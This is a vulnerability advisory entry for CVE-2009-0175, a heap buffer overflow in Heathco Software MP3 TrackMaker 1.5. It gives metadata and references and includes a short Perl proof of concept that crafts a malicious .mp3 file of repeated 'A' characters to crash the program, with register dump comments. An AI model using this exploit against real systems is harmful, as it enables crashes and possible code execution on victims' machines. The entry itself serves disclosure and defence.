Heathcosoft MP3 TrackMaker '.mp3' File Remote Heap Buffer Overflow Vulnerability

Vulnerability ID: 1117221; Vulnerability type: Buffer overflow
Published: 2009-01-09; Updated: 2009-01-29
CVE ID: CVE-2009-0175; CNNVD-ID: CNNVD-200901-227
Platform: Windows; CVSS score: 9.3
|Vulnerability Sources
https://www.exploit-db.com/exploits/7708
https://cxsecurity.com/issue/WLB-2009010170
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-227
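|Vulnerability Details
A heap-based buffer overflow exists in Heathco Software MP3 TrackMaker version 1.5. A remote attacker can use a long string in an invalid .mp3 file to cause a denial of service (application crash) and possibly execute arbitrary code.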
|Vulnerability Exploit (PoC)
# #!/bin/perl

# Author : HouSSamix

# MP3 TrackMaker v1.5 .mp3 File Heap Overflow PoC
# http://www.heathcosoft.com/software/mp3trackmaker/mp3tm15.exe

# open the program > browse (source file) > file exploit

#EAX 41414141  <<< 
#ECX 000000F8
#EDX 0000020A
#EBX 00000000
#ESP 0012F408
#EBP 0012F470
#ESI 00000000
#EDI 00000158
#EIP 7C91EB94 ntdll.KiFastSystemCallRet

print "===================================================================== \n";
print "Author : Houssamix  \n";
print "===================================================================== \n";
print "MP3 TrackMaker v1.5 .mp3 File Heap Overflow PoC						 \n";
print "===================================================================== \n\n";

my $file="hsmx.mp3";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE  "A" x 1200;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-01-09]
|References

Source: XF
Name: mp3trackmaker-mp3-bo(47852)
Link: http://xforce.iss.net/xforce/xfdb/47852
Source: BID
Name: 33183
Link: http://www.securityfocus.com/bid/33183
Source: MILW0RM
Name: 7708
Link: http://www.milw0rm.com/exploits/7708
Source: SREASON
Name: 4920
Link: http://securityreason.com/securityalert/4920